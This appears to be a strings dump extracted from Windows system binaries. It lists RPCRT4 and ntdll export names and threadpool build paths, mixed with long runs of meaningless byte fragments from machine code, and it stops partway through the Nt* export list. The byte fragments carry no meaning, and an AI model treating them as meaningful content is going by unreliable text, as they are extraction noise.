I_RpcNegotiateTransferSyntax I_RpcNsBindingSetEntryName I_RpcNsBindingSetEntryNameA I_RpcNsBindingSetEntryNameW I_RpcNsInterfaceExported I_RpcNsInterfaceUnexported I_RpcOpenClientProcess I_RpcOpenClientThread I_RpcParseSecurity I_RpcPauseExecution I_RpcReallocPipeBuffer I_RpcReceive I_RpcRecordCalloutFailure I_RpcRequestMutex I_RpcSNCHOption I_RpcSend I_RpcSendReceive I_RpcServerAllocateIpPort I_RpcServerCheckClientRestriction I_RpcServerInqAddressChangeFn I_RpcServerInqLocalConnAddress I_RpcServerInqRemoteConnAddress I_RpcServerInqTransportType I_RpcServerIsClientDisconnected I_RpcServerRegisterForwardFunction I_RpcServerSetAddressChangeFn I_RpcServerStartService I_RpcServerTurnOnOffKeepalives I_RpcServerUseProtseq2A I_RpcServerUseProtseq2W I_RpcServerUseProtseqEp2A I_RpcServerUseProtseqEp2W I_RpcSessionStrictContextHandle I_RpcSetDCOMAppId I_RpcSsDontSerializeContext I_RpcSystemFunction001 I_RpcTransConnectionAllocatePacket I_RpcTransConnectionFreePacket I_RpcTransConnectionReallocPacket I_RpcTransDatagramAllocate I_RpcTransDatagramAllocate2 I_RpcTransDatagramFree I_RpcTransGetThreadEvent I_RpcTransGetThreadEventThreadOptional I_RpcTransIoCancelled I_RpcTransServerNewConnection I_RpcTurnOnEEInfoPropagation I_RpcVerifierCorruptionExpected I_UuidCreate MIDL_wchar_strcpy MIDL_wchar_strlen MesBufferHandleReset MesDecodeBufferHandleCreate MesDecodeIncrementalHandleCreate MesEncodeDynBufferHandleCreate MesEncodeFixedBufferHandleCreate MesEncodeIncrementalHandleCreate MesHandleFree MesIncrementalHandleReset MesInqProcEncodingId NDRCContextBinding NDRCContextMarshall NDRCContextUnmarshall NDRSContextMarshall NDRSContextMarshall2 NDRSContextMarshallEx NDRSContextUnmarshall NDRSContextUnmarshall2 NDRSContextUnmarshallEx NDRcopy NdrAllocate NdrAsyncClientCall NdrAsyncServerCall NdrByteCountPointerBufferSize NdrByteCountPointerFree NdrByteCountPointerMarshall NdrByteCountPointerUnmarshall NdrCStdStubBuffer2_Release NdrCStdStubBuffer_Release NdrClearOutParameters NdrClientCall NdrClientCall2 NdrClientContextMarshall NdrClientContextUnmarshall NdrClientInitialize NdrClientInitializeNew NdrComplexArrayBufferSize NdrComplexArrayFree NdrComplexArrayMarshall NdrComplexArrayMemorySize NdrComplexArrayUnmarshall NdrComplexStructBufferSize NdrComplexStructFree NdrComplexStructMarshall NdrComplexStructMemorySize NdrComplexStructUnmarshall NdrConformantArrayBufferSize NdrConformantArrayFree NdrConformantArrayMarshall NdrConformantArrayMemorySize NdrConformantArrayUnmarshall NdrConformantStringBufferSize NdrConformantStringMarshall NdrConformantStringMemorySize NdrConformantStringUnmarshall NdrConformantStructBufferSize NdrConformantStructFree NdrConformantStructMarshall NdrConformantStructMemorySize NdrConformantStructUnmarshall NdrConformantVaryingArrayBufferSize NdrConformantVaryingArrayFree NdrConformantVaryingArrayMarshall NdrConformantVaryingArrayMemorySize NdrConformantVaryingArrayUnmarshall NdrConformantVaryingStructBufferSize NdrConformantVaryingStructFree NdrConformantVaryingStructMarshall NdrConformantVaryingStructMemorySize NdrConformantVaryingStructUnmarshall NdrContextHandleInitialize NdrContextHandleSize NdrConvert NdrConvert2 NdrCorrelationFree NdrCorrelationInitialize NdrCorrelationPass NdrCreateServerInterfaceFromStub NdrDcomAsyncClientCall NdrDcomAsyncStubCall NdrDllCanUnloadNow NdrDllGetClassObject NdrDllRegisterProxy NdrDllUnregisterProxy NdrEncapsulatedUnionBufferSize NdrEncapsulatedUnionFree NdrEncapsulatedUnionMarshall NdrEncapsulatedUnionMemorySize NdrEncapsulatedUnionUnmarshall NdrFixedArrayBufferSize NdrFixedArrayFree NdrFixedArrayMarshall NdrFixedArrayMemorySize NdrFixedArrayUnmarshall NdrFreeBuffer NdrFullPointerFree NdrFullPointerInsertRefId NdrFullPointerQueryPointer NdrFullPointerQueryRefId NdrFullPointerXlatFree NdrFullPointerXlatInit NdrGetBaseInterfaceFromStub NdrGetBuffer NdrGetDcomProtocolVersion NdrGetSimpleTypeBufferAlignment NdrGetSimpleTypeBufferSize NdrGetSimpleTypeMemorySize NdrGetTypeFlags NdrGetUserMarshalInfo NdrInterfacePointerBufferSize NdrInterfacePointerFree NdrInterfacePointerMarshall NdrInterfacePointerMemorySize NdrInterfacePointerUnmarshall NdrMapCommAndFaultStatus NdrMesProcEncodeDecode NdrMesProcEncodeDecode2 NdrMesSimpleTypeAlignSize NdrMesSimpleTypeDecode NdrMesSimpleTypeEncode NdrMesTypeAlignSize NdrMesTypeAlignSize2 NdrMesTypeDecode NdrMesTypeDecode2 NdrMesTypeEncode NdrMesTypeEncode2 NdrMesTypeFree2 NdrNonConformantStringBufferSize NdrNonConformantStringMarshall NdrNonConformantStringMemorySize NdrNonConformantStringUnmarshall NdrNonEncapsulatedUnionBufferSize NdrNonEncapsulatedUnionFree NdrNonEncapsulatedUnionMarshall NdrNonEncapsulatedUnionMemorySize NdrNonEncapsulatedUnionUnmarshall NdrNsGetBuffer NdrNsSendReceive NdrOleAllocate NdrOleFree NdrOutInit NdrPartialIgnoreClientBufferSize NdrPartialIgnoreClientMarshall NdrPartialIgnoreServerInitialize NdrPartialIgnoreServerUnmarshall NdrPointerBufferSize NdrPointerFree NdrPointerMarshall NdrPointerMemorySize NdrPointerUnmarshall NdrProxyErrorHandler NdrProxyFreeBuffer NdrProxyGetBuffer NdrProxyInitialize NdrProxySendReceive NdrRangeUnmarshall NdrRpcSmClientAllocate NdrRpcSmClientFree NdrRpcSmSetClientToOsf NdrRpcSsDefaultAllocate NdrRpcSsDefaultFree NdrRpcSsDisableAllocate NdrRpcSsEnableAllocate NdrSendReceive NdrServerCall NdrServerCall2 NdrServerContextMarshall NdrServerContextNewMarshall NdrServerContextNewUnmarshall NdrServerContextUnmarshall NdrServerInitialize NdrServerInitializeMarshall NdrServerInitializeNew NdrServerInitializePartial NdrServerInitializeUnmarshall NdrServerMarshall NdrServerUnmarshall NdrSimpleStructBufferSize NdrSimpleStructFree NdrSimpleStructMarshall NdrSimpleStructMemorySize NdrSimpleStructUnmarshall NdrSimpleTypeMarshall NdrSimpleTypeUnmarshall NdrStubCall NdrStubCall2 NdrStubForwardingFunction NdrStubGetBuffer NdrStubInitialize NdrStubInitializeMarshall NdrTypeFlags NdrTypeFree NdrTypeMarshall NdrTypeSize NdrTypeUnmarshall NdrUnmarshallBasetypeInline NdrUserMarshalBufferSize NdrUserMarshalFree NdrUserMarshalMarshall NdrUserMarshalMemorySize NdrUserMarshalSimpleTypeConvert NdrUserMarshalUnmarshall NdrVaryingArrayBufferSize NdrVaryingArrayFree NdrVaryingArrayMarshall NdrVaryingArrayMemorySize NdrVaryingArrayUnmarshall NdrXmitOrRepAsBufferSize NdrXmitOrRepAsFree NdrXmitOrRepAsMarshall NdrXmitOrRepAsMemorySize NdrXmitOrRepAsUnmarshall NdrpCreateProxy NdrpCreateStub NdrpGetProcFormatString NdrpGetTypeFormatString NdrpGetTypeGenCookie NdrpMemoryIncrement NdrpReleaseTypeFormatString NdrpReleaseTypeGenCookie NdrpVarVtOfTypeDesc RpcAsyncAbortCall RpcAsyncCancelCall RpcAsyncCompleteCall RpcAsyncGetCallStatus RpcAsyncInitializeHandle RpcAsyncRegisterInfo RpcBindingBind RpcBindingCopy RpcBindingCreateA RpcBindingCreateW RpcBindingFree RpcBindingFromStringBindingA RpcBindingFromStringBindingW RpcBindingInqAuthClientA RpcBindingInqAuthClientExA RpcBindingInqAuthClientExW RpcBindingInqAuthClientW RpcBindingInqAuthInfoA RpcBindingInqAuthInfoExA RpcBindingInqAuthInfoExW RpcBindingInqAuthInfoW RpcBindingInqObject RpcBindingInqOption RpcBindingReset RpcBindingServerFromClient RpcBindingSetAuthInfoA RpcBindingSetAuthInfoExA RpcBindingSetAuthInfoExW RpcBindingSetAuthInfoW RpcBindingSetObject RpcBindingSetOption RpcBindingToStringBindingA RpcBindingToStringBindingW RpcBindingUnbind RpcBindingVectorFree RpcCancelThread RpcCancelThreadEx RpcCertGeneratePrincipalNameA RpcCertGeneratePrincipalNameW RpcCertMatchPrincipalName RpcEpRegisterA RpcEpRegisterNoReplaceA RpcEpRegisterNoReplaceW RpcEpRegisterW RpcEpResolveBinding RpcEpUnregister RpcErrorAddRecord RpcErrorClearInformation RpcErrorEndEnumeration RpcErrorGetNextRecord RpcErrorGetNumberOfRecords RpcErrorLoadErrorInfo RpcErrorResetEnumeration RpcErrorSaveErrorInfo RpcErrorStartEnumeration RpcExceptionFilter RpcFreeAuthorizationContext RpcGetAuthorizationContextForClient RpcIfIdVectorFree RpcIfInqId RpcImpersonateClient RpcMgmtEnableIdleCleanup RpcMgmtEpEltInqBegin RpcMgmtEpEltInqDone RpcMgmtEpEltInqNextA RpcMgmtEpEltInqNextW RpcMgmtEpUnregister RpcMgmtInqComTimeout RpcMgmtInqDefaultProtectLevel RpcMgmtInqIfIds RpcMgmtInqServerPrincNameA RpcMgmtInqServerPrincNameW RpcMgmtInqStats RpcMgmtIsServerListening RpcMgmtSetAuthorizationFn RpcMgmtSetCancelTimeout RpcMgmtSetComTimeout RpcMgmtSetServerStackSize RpcMgmtStatsVectorFree RpcMgmtStopServerListening RpcMgmtWaitServerListen RpcNetworkInqProtseqsA RpcNetworkInqProtseqsW RpcNetworkIsProtseqValidA RpcNetworkIsProtseqValidW RpcNsBindingInqEntryNameA RpcNsBindingInqEntryNameW RpcObjectInqType RpcObjectSetInqFn RpcObjectSetType RpcProtseqVectorFreeA RpcProtseqVectorFreeW RpcRaiseException RpcRevertToSelf RpcRevertToSelfEx RpcServerCompleteSecurityCallback RpcServerInqBindingHandle RpcServerInqBindings RpcServerInqCallAttributesA RpcServerInqCallAttributesW RpcServerInqDefaultPrincNameA RpcServerInqDefaultPrincNameW RpcServerInqIf RpcServerListen RpcServerRegisterAuthInfoA RpcServerRegisterAuthInfoW RpcServerRegisterIf RpcServerRegisterIf2 RpcServerRegisterIfEx RpcServerSubscribeForNotification RpcServerTestCancel RpcServerUnregisterIf RpcServerUnregisterIfEx RpcServerUnsubscribeForNotification RpcServerUseAllProtseqs RpcServerUseAllProtseqsEx RpcServerUseAllProtseqsIf RpcServerUseAllProtseqsIfEx RpcServerUseProtseqA RpcServerUseProtseqEpA RpcServerUseProtseqEpExA RpcServerUseProtseqEpExW RpcServerUseProtseqEpW RpcServerUseProtseqExA RpcServerUseProtseqExW RpcServerUseProtseqIfA RpcServerUseProtseqIfExA RpcServerUseProtseqIfExW RpcServerUseProtseqIfW RpcServerUseProtseqW RpcServerYield RpcSmAllocate RpcSmClientFree RpcSmDestroyClientContext RpcSmDisableAllocate RpcSmEnableAllocate RpcSmFree RpcSmGetThreadHandle RpcSmSetClientAllocFree RpcSmSetThreadHandle RpcSmSwapClientAllocFree RpcSsAllocate RpcSsContextLockExclusive RpcSsContextLockShared RpcSsDestroyClientContext RpcSsDisableAllocate RpcSsDontSerializeContext RpcSsEnableAllocate RpcSsFree RpcSsGetContextBinding RpcSsGetThreadHandle RpcSsSetClientAllocFree RpcSsSetThreadHandle RpcSsSwapClientAllocFree RpcStringBindingComposeA RpcStringBindingComposeW RpcStringBindingParseA RpcStringBindingParseW RpcStringFreeA RpcStringFreeW RpcTestCancel RpcUserFree SimpleTypeAlignment SimpleTypeBufferSize SimpleTypeMemorySize TowerConstruct TowerExplode UuidCompare UuidCreate UuidCreateNil UuidCreateSequential UuidEqual UuidFromStringA UuidFromStringW UuidHash UuidIsNil UuidToStringA UuidToStringW char_array_from_ndr char_from_ndr data_from_ndr data_into_ndr data_size_ndr double_array_from_ndr double_from_ndr enum_from_ndr float_array_from_ndr float_from_ndr long_array_from_ndr long_from_ndr long_from_ndr_temp pfnFreeRoutines pfnMarshallRoutines pfnSizeRoutines pfnUnmarshallRoutines short_array_from_ndr short_from_ndr short_from_ndr_temp tree_into_ndr tree_peek_ndr tree_size_ndr RPCRT4.I_RpcBindingInqDynamicEndpointW RPCRT4.I_RpcNsBindingSetEntryNameW RPCRT4.I_RpcSsDontSerializeContext _^[] jDjH wVjCjH |wVw}w w m}w N{wVw}w ~w m}w |wQm %{wVw}w #{w m}w ~w=+|wX+|w QSWh FhIG}w FljG}w _^[] K\HI y~w8z~w w`V{wr v":3 \&\@ K\HJ K\HJ K\HJ K\HI v":3 Pz~w {~whz~w K\F\ H$V3 w7F3 _^Y] _^[Y] VpWV c}wVw}w |w}&}wF |w m}w/ ~w m}wS wzT}w T}w< w}w>< U}w5^}w^w}w c}wVw}w ~w7x}w |w}&}wF |w m}w/ ~w m}wS wzT}w T}w< w}w>< U}w5^}w^w}w ~wVw}w w m}w m}w w2X{w |w#: >{w:>{wm>{w1 |wVw}wu F|wm ~w m}w w,p|wa w m}w/ o{w m}wG y|wq!~wm ~w2k|w w m}w {wNB wVw}wD |wVw}w |wVw}w wVw}w |wVw}w }wVw}w w m}w m}w }wL5|w |wEN L|wA ~wG>|wVw}w ;|w2W B|wVw}w ~wVw}w wVw}w w,p|wa w m}w ~w m}w w m}w w m}w w m}w7p wVw}w m}wa ~wZu wVw}w ~wiv wVw}wa ~w[q wVw}w wVw}w '}wF w m}w> wVw}w w m}w m}w wVw}w w m}w c}wVw}w w m}w m}w _}w; |w2X{w w#O}w( }w#: ~w_^}wm \}wo {w_^}wQ }w=; }w m}w ~wVw}wpx}wa wVw}w }wOg w m}w ~w m}wU] w m}w ~w m}wU] |w}U t3_^ WVj+jr ~wVw}w wVw}w \$$9]4 [9u( GL9u OX9uD 9|$ 9|$$ QSVW _^[] CTWP PSj=jhj"X PWj=jhj"X PWj=jhj"X ~wpU{w PWj=jcj"X >98uD WWVP PVjcjP {wWWjcjP SVW3 QjdjP {w9t$ SVjdjP SVjdjP3 Sj=jaj"X C0VW D$8P CPQWWW t$,Q L$\Q L$XQP VjcjL PSj=jhj"X GTSP Wjcja PSj=jaj"X _^[] ^[Y] PSj=jhj"X _^Y] D$,P 9\$(u ~w_6 QSVW G,HH jdjL w4;^ Wjdja3 Wj X PVj=jhj"X GTVP {w^[ ~wVw}w ~wVw}w w}&}wF w m}w |w m}w/ ~wFi t{wF ~wrh t{wm QPVW _^[Y] PVj=jhj"X t$0RSSS t$XQ WVjcjh3 Wjdjh3 $}wK Y__^[ _^Y] ?|wG !|w> w^&|w w,p|wa w m}w w m}wG |w[*|w o{wnX w=4|w4 5|wIW 4|w m}w w m}w ?|wG !|w> w,p|wa w m}w w m}wG o{wnX w=4|w4 5|wIW 4|w m}w w m}w 6^[] ,SV3 P`+Pd QVh( @_[^ SSh` ;|$ D$ Sh w;t$$w ;|$ r t$$Sh 9\$0 wu$j ~wSh HMEN ~9kLsE VWu:j@ wu2h, wuAjX wuMh t!9] CTjd MaxRpcSize Software\Microsoft\Rpc SVWj SVW3 {w9=H {whH ;ND| ~(9;u* WWWW SVW3 wuJd wu#jh vGj( jBjb3 SVW3 7NVWjbjb3 ;h|03 %H ^9[] GPtF ~w_[ QQSVW $SVW t,Ht H f!F" D$ ; 9L$$ D$(f F"_^[ 8A t A9@u _^[] ^@_[] LMEM _^[] w1}}w; |w%j w1}}w QSVW ^9_^[Y] <[t'_^] SVWh0 Vjcjh PWhk j([S u!WVh QRPh hH hl0 AVW9H 7_^] hH u#h0u jlhHe D$(SP D$(_f F"^3 uOj8 SjbjL r-_^ ]_^[ w m}w w,p|wa w m}w/ o{w m}wG y|wq!~wm ~w2k|w w m}w {wNB wVw}wD @ Wj ubj@[S PSWj _[t t99~ Vj-jr hH VWjDjL PjXjb RPC: BCache corruption detected at 0x%p jXjb Vj-jr jdjL VPjdjL3 P9\$ D$ PV 9\$ t D$$S V9D$ D$ PS SSSPS wVw}w ~w#l |w}&}wF |w m}w/ ~w m}w ~w_j ~w-k w m}w 9|$( PWWW t$,P D$\P D$XP D$ jcjL R ;T$ R$;T$ Xj0f D$,j0 GPjKjL L$(@ jWX^ 8LMEM t1Jj #.zf +o*7 QPh ~_9] wjAP 4A+E SVW3 t$9} _^[] _^[] TppIopCallbackEpilog ~_9} FALSE PSVW _^[] TppTimerpDestroyTimerQueueQueue _^[] j@X9E uG9} @@Nu @@f; @@f; wtKd tc9u Pj%j @0Wj @SVW3 PSSh j=Xf j:Xf QSVW PWj#j A:hH @0VS 9sLt 9~Lt lSV3 PSSj @WuXd @0j8S t,;E u 9] jAXf; u 9E xtZf SVWh t ;Fp wt{V @0Vj !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ u ;M u 9E 4x+} t79] t29] t-9] VVVVV t$HHt <*u+ <*u% WVj0 PPPPP RPSW QPhd AA;M TpSetPoolMaxThreads PSVW TpSetPoolMinThreads RPSW |/SVW ][_^ |/SVW wWWWh @0Vj @0Sj VjeY3 _^[] $$SV s4WS v$+u ^$Sh _^[] TppWaiterpWaitTimerExpired @@BBf; _^[] @0Vj PPPS PjHV _^[t j hh$ 8Y(uv wtkd jLXjNf _^[] TppCleanupGroupMemberWait PPPS PSVW @0Vj @0Vh( QS@P j%Xf !t(f TppSimplepExecuteCallback d:\w7rtm\minkernel\threadpool\ntdll\simple.c TppSimplepFree tSW3 @0VS URPQQh L$,3 UVWS [_^] SVWj _^[] SVWUj ]_^[ ;t$,v- UQPXY]Y[ $0< _@^] $VWhv VVVVh r ;E u=9] ar#f ar f @_^[ TppCleanupGroupMemberRelease _^[] TppTimerpDequeueTimer TppAlpcpValidateAlpc QSVW PWVSSj @0VS u/;] r ;E @0SV t 9] t 3GP t 3GP WLt 3WP Y_^[ f3FT PQSV SVW3 j X9E AAf; uT9u VjeY3 SVWt2 @t^j t[9} ArBf _[^] H8Af @0VS SsHd; [_^] j=Xf f9x: pP96 f9~: _^[] O,j@X \rij\ VW9] _^[] t$f9 FFJu TpBindAlpcToDirect 3Fx# vTVS SVWjBXf jDX3 t39X|t.9 HSVj8Xj:f Xj6f j8X3 @sFlst Flst PSVW TpIsTimerSet tpW3 >Flst t49X 0^_[ KTf3 8Atomu f9;t/ j%[VW hAtmT Atom 8_^[ AcMg _^[] SVW3 8Actx _^[] RQPWj _f90t _^[] WWVj t-9y|v( Pj"j QSVW }'=4 @0Sj Pj@j H;1r QQSVW 3GXu} tuf t69E AACCN 9_^[] j\Zf wSh@ QQSV3 QSSPW @0VS @0Vj FU8E NL#E PPPPPP @0VS _^[] TpUnreserveTaskPost VWj% F4Sj ?GsHd ;GsHd PQQS Pj0h OTf3N SPVW 9CLt VW8] @0VS PPPj 9_Lt wt8V Pj"V t2SV @0Wj ^[_] jlhx f9~: QQSVd t.h0 wd:\w7rtm\minkernel\threadpool\ntdll\wait.c d:\w7rtm\minkernel\threadpool\ntdll\waiter.c w_^[ SSSSS w_^[ _^[] j\h@" wt8d F` u F`@u w_^[ @_^[ w_^[ FtSW _^[] TppWaitpExecuteCallback _^[] TppWaitComplete w_^[ TppTimerpExecuteCallback TppTimerpUpdate wSVW d:\w7rtm\minkernel\threadpool\ntdll\cgrpmem.c Qj P t`SVW _^[] TppCleanupGroupMemberCompleteCallbacks _^[] TppCleanupGroupMemberAddCallback A ;U d:\w7rtm\minkernel\threadpool\ntdll\lpc.c _^[] TppAlpcpCallbackEpilog d:\w7rtm\minkernel\threadpool\ntdll\callback.c TppCallbackMayRunLongProlog TpCallbackIndependent t SV ^[_] w;H$ HU8K HH#U _^[] AAf9 Sj Z; [_^] BBFF GGBBf <$tPf WVS3 WVU3 v N+D$ v N+D$ <$t6f |%=2 |!=2 t&:a PPPPPPPP PPPPPPPP PPPPPPPP <$tTf N+t$ [_^] ntdll.dll A_SHAFinal A_SHAInit A_SHAUpdate AlpcAdjustCompletionListConcurrencyCount AlpcFreeCompletionListMessage AlpcGetCompletionListLastMessageInformation AlpcGetCompletionListMessageAttributes AlpcGetHeaderSize AlpcGetMessageAttribute AlpcGetMessageFromCompletionList AlpcGetOutstandingCompletionListMessageCount AlpcInitializeMessageAttribute AlpcMaxAllowedMessageLength AlpcRegisterCompletionList AlpcRegisterCompletionListWorkerThread AlpcRundownCompletionList AlpcUnregisterCompletionList AlpcUnregisterCompletionListWorkerThread CsrAllocateCaptureBuffer CsrAllocateMessagePointer CsrCaptureMessageBuffer CsrCaptureMessageMultiUnicodeStringsInPlace CsrCaptureMessageString CsrCaptureTimeout CsrClientCallServer CsrClientConnectToServer CsrFreeCaptureBuffer CsrGetProcessId CsrIdentifyAlertableThread CsrSetPriorityClass CsrVerifyRegion DbgBreakPoint DbgPrint DbgPrintEx DbgPrintReturnControlC DbgPrompt DbgQueryDebugFilterState DbgSetDebugFilterState DbgUiConnectToDbg DbgUiContinue DbgUiConvertStateChangeStructure DbgUiDebugActiveProcess DbgUiGetThreadDebugObject DbgUiIssueRemoteBreakin DbgUiRemoteBreakin DbgUiSetThreadDebugObject DbgUiStopDebugging DbgUiWaitStateChange DbgUserBreakPoint EtwCreateTraceInstanceId EtwDeliverDataBlock EtwEnumerateProcessRegGuids EtwEventActivityIdControl EtwEventEnabled EtwEventProviderEnabled EtwEventRegister EtwEventSetInformation EtwEventUnregister EtwEventWrite EtwEventWriteEndScenario EtwEventWriteEx EtwEventWriteFull EtwEventWriteNoRegistration EtwEventWriteStartScenario EtwEventWriteString EtwEventWriteTransfer EtwGetTraceEnableFlags EtwGetTraceEnableLevel EtwGetTraceLoggerHandle EtwLogTraceEvent EtwNotificationRegister EtwNotificationUnregister EtwProcessPrivateLoggerRequest EtwRegisterSecurityProvider EtwRegisterTraceGuidsA EtwRegisterTraceGuidsW EtwReplyNotification EtwSendNotification EtwSetMark EtwTraceEventInstance EtwTraceMessage EtwTraceMessageVa EtwUnregisterTraceGuids EtwWriteUMSecurityEvent EtwpCreateEtwThread EtwpGetCpuSpeed EtwpNotificationThread EvtIntReportAuthzEventAndSourceAsync EvtIntReportEventAndSourceAsync ExpInterlockedPopEntrySListEnd ExpInterlockedPopEntrySListFault ExpInterlockedPopEntrySListResume KiFastSystemCall KiFastSystemCallRet KiIntSystemCall KiRaiseUserExceptionDispatcher KiUserApcDispatcher KiUserCallbackDispatcher KiUserExceptionDispatcher LdrAccessResource LdrAddLoadAsDataTable LdrAddRefDll LdrDisableThreadCalloutsForDll LdrEnumResources LdrEnumerateLoadedModules LdrFindEntryForAddress LdrFindResourceDirectory_U LdrFindResourceEx_U LdrFindResource_U LdrFlushAlternateResourceModules LdrGetDllHandle LdrGetDllHandleByMapping LdrGetDllHandleByName LdrGetDllHandleEx LdrGetFailureData LdrGetFileNameFromLoadAsDataTable LdrGetProcedureAddress LdrGetProcedureAddressEx LdrHotPatchRoutine LdrInitShimEngineDynamic LdrInitializeThunk LdrLoadAlternateResourceModule LdrLoadAlternateResourceModuleEx LdrLoadDll LdrLockLoaderLock LdrOpenImageFileOptionsKey LdrProcessRelocationBlock LdrQueryImageFileExecutionOptions LdrQueryImageFileExecutionOptionsEx LdrQueryImageFileKeyOption LdrQueryModuleServiceTags LdrQueryProcessModuleInformation LdrRegisterDllNotification LdrRemoveLoadAsDataTable LdrResFindResource LdrResFindResourceDirectory LdrResGetRCConfig LdrResRelease LdrResSearchResource LdrRscIsTypeExist LdrSetAppCompatDllRedirectionCallback LdrSetDllManifestProber LdrSetMUICacheType LdrShutdownProcess LdrShutdownThread LdrSystemDllInitBlock LdrUnloadAlternateResourceModule LdrUnloadAlternateResourceModuleEx LdrUnloadDll LdrUnlockLoaderLock LdrUnregisterDllNotification LdrVerifyImageMatchesChecksum LdrVerifyImageMatchesChecksumEx LdrpResGetMappingSize LdrpResGetResourceDirectory MD4Final MD4Init MD4Update MD5Final MD5Init MD5Update NlsAnsiCodePage NlsMbCodePageTag NlsMbOemCodePageTag NtAcceptConnectPort NtAccessCheck NtAccessCheckAndAuditAlarm NtAccessCheckByType NtAccessCheckByTypeAndAuditAlarm NtAccessCheckByTypeResultList NtAccessCheckByTypeResultListAndAuditAlarm NtAccessCheckByTypeResultListAndAuditAlarmByHandle NtAddAtom NtAddBootEntry NtAddDriverEntry NtAdjustGroupsToken NtAdjustPrivilegesToken NtAlertResumeThread NtAlertThread NtAllocateLocallyUniqueId NtAllocateReserveObject NtAllocateUserPhysicalPages NtAllocateUuids NtAllocateVirtualMemory NtAlpcAcceptConnectPort NtAlpcCancelMessage NtAlpcConnectPort NtAlpcCreatePort NtAlpcCreatePortSection NtAlpcCreateResourceReserve NtAlpcCreateSectionView NtAlpcCreateSecurityContext NtAlpcDeletePortSection NtAlpcDeleteResourceReserve NtAlpcDeleteSectionView NtAlpcDeleteSecurityContext NtAlpcDisconnectPort NtAlpcImpersonateClientOfPort NtAlpcOpenSenderProcess NtAlpcOpenSenderThread NtAlpcQueryInformation NtAlpcQueryInformationMessage NtAlpcRevokeSecurityContext NtAlpcSendWaitReceivePort NtAlpcSetInformation NtApphelpCacheControl NtAreMappedFilesTheSame NtAssignProcessToJobObject NtCallbackReturn NtCancelIoFile NtCancelIoFileEx NtCancelSynchronousIoFile NtCancelTimer NtClearEvent NtClose NtCloseObjectAuditAlarm NtCommitComplete NtCommitEnlistment NtCommitTransaction NtCompactKeys NtCompareTokens NtCompleteConnectPort NtCompressKey NtConnectPort NtContinue NtCreateDebugObject NtCreateDirectoryObject NtCreateEnlistment NtCreateEvent NtCreateEventPair NtCreateFile NtCreateIoCompletion NtCreateJobObject NtCreateJobSet NtCreateKey NtCreateKeyTransacted NtCreateKeyedEvent NtCreateMailslotFile NtCreateMutant NtCreateNamedPipeFile NtCreatePagingFile NtCreatePort NtCreatePrivateNamespace NtCreateProcess NtCreateProcessEx NtCreateProfile NtCreateProfileEx NtCreateResourceManager NtCreateSection NtCreateSemaphore NtCreateSymbolicLinkObject NtCreateThread NtCreateThreadEx NtCreateTimer NtCreateToken NtCreateTransaction NtCreateTransactionManager NtCreateUserProcess NtCreateWaitablePort NtCreateWorkerFactory NtCurrentTeb NtDebugActiveProcess NtDebugContinue NtDelayExecution NtDeleteAtom NtDeleteBootEntry NtDeleteDriverEntry NtDeleteFile NtDeleteKey NtDeleteObjectAuditAlarm NtDeletePrivateNamespace NtDeleteValueKey NtDeviceIoControlFile NtDisableLastKnownGood NtDisplayString NtDrawText NtDuplicateObject NtDuplicateToken NtEnableLastKnownGood NtEnumerateBootEntries NtEnumerateDriverEntries NtEnumerateKey NtEnumerateSystemEnvironmentValuesEx NtEnumerateTransactionObject NtEnumerateValueKey NtExtendSection NtFilterToken NtFindAtom NtFlushBuffersFile NtFlushInstallUILanguage NtFlushInstructionCache NtFlushKey NtFlushProcessWriteBuffers NtFlushVirtualMemory NtFlushWriteBuffer NtFreeUserPhysicalPages NtFreeVirtualMemory NtFreezeRegistry NtFreezeTransactions NtFsControlFile NtGetContextThread NtGetCurrentProcessorNumber NtGetDevicePowerState NtGetMUIRegistryInfo NtGetNextProcess NtGetNextThread NtGetNlsSectionPtr NtGetNotificationResourceManager NtGetPlugPlayEvent NtGetTickCount NtGetWriteWatch NtImpersonateAnonymousToken NtImpersonateClientOfPort NtImpersonateThread NtInitializeNlsFiles NtInitializeRegistry NtInitiatePowerAction NtIsProcessInJob NtIsSystemResumeAutomatic NtIsUILanguageComitted NtListenPort NtLoadDriver NtLoadKey NtLoadKey2 NtLoadKeyEx NtLockFile NtLockProductActivationKeys NtLockRegistryKey NtLockVirtualMemory NtMakePermanentObject NtMakeTemporaryObject NtMapCMFModule NtMapUserPhysicalPages NtMapUserPhysicalPagesScatter NtMapViewOfSection NtModifyBootEntry NtModifyDriverEntry NtNotifyChangeDirectoryFile NtNotifyChangeKey NtNotifyChangeMultipleKeys NtNotifyChangeSession NtOpenDirectoryObject NtOpenEnlistment NtOpenEvent NtOpenEventPair NtOpenFile NtOpenIoCompletion NtOpenJobObject NtOpenKey NtOpenKeyEx NtOpenKeyTransacted NtOpenKeyTransactedEx NtOpenKeyedEvent NtOpenMutant NtOpenObjectAuditAlarm NtOpenPrivateNamespace NtOpenProcess NtOpenProcessToken NtOpenProcessTokenEx NtOpenResourceManager NtOpenSection NtOpenSemaphore NtOpenSession NtOpenSymbolicLinkObject NtOpenThread NtOpenThreadToken NtOpenThreadTokenEx NtOpenTimer NtOpenTransaction NtOpenTransactionManager NtPlugPlayControl NtPowerInformation NtPrePrepareComplete NtPrePrepareEnlistment NtPrepareComplete NtPrepareEnlistment NtPrivilegeCheck NtPrivilegeObjectAuditAlarm NtPrivilegedServiceAuditAlarm NtPropagationComplete NtPropagationFailed NtProtectVirtualMemory NtPulseEvent NtQueryAttributesFile NtQueryBootEntryOrder NtQueryBootOptions NtQueryDebugFilterState NtQueryDefaultLocale NtQueryDefaultUILanguage NtQueryDirectoryFile NtQueryDirectoryObject NtQueryDriverEntryOrder NtQueryEaFile NtQueryEvent NtQueryFullAttributesFile NtQueryInformationAtom NtQueryInformationEnlistment NtQueryInformationFile NtQueryInformationJobObject NtQueryInformationPort NtQueryInformationProcess NtQueryInformationResourceManager NtQueryInformationThread NtQueryInformationToken NtQueryInformationTransaction NtQueryInformationTransactionManager NtQueryInformationWorkerFactory NtQueryInstallUILanguage NtQueryIntervalProfile NtQueryIoCompletion NtQueryKey NtQueryLicenseValue NtQueryMultipleValueKey NtQueryMutant NtQueryObject NtQueryOpenSubKeys NtQueryOpenSubKeysEx NtQueryPerformanceCounter NtQueryPortInformationProcess NtQueryQuotaInformationFile NtQuerySection NtQuerySecurityAttributesToken NtQuerySecurityObject NtQuerySemaphore NtQuerySymbolicLinkObject 